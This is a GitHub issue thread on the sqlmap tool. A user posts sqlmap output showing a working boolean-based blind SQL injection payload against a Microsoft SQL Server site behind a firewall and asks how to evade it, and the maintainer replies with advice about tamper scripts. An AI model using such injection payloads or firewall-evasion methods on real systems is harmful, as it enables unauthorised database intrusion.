### ISSUE TITLE
can i have some suggest bypass this WAF/IPS/IDS from sqlmap ?

### ISSUE THREAD

**Issue by vitural** [sqlmapproject/sqlmap#2395]
[CRITICAL] previous heuristics detected that the target is protected
by some kind of WAF/IPS/..

C:\Python27\sqlmap>sqlmap.py -u http://www.example.com/detail.aspx?id
=5812
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.1.13#dev}
|_ -| . [']     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program

[*] starting at 02:31:07

[02:31:08] [INFO] resuming back-end DBMS 'microsoft sql server'
[02:31:08] [INFO] testing connection to the target URL
[02:31:11] [INFO] heuristics detected web page charset 'windows-1252'
# [02:31:11] [CRITICAL] previous heuristics detected that the target is protected
by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=5812' AND 8386=8386 AND 'ARAp'='ARAp
---
[02:31:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, Microsoft IIS 8.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
[02:31:11] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.example.com'

**Comment by stamparm** [comment]
Go to tamper directory and take a look into the content of python scripts. Inside you'll find DBMSes that are supported by those same scripts. Choose those for MsSQL and try to use one by one.

**Comment by vitural** [comment]
Thank for your reply bro ,  i hope ,we can share together more than that :)
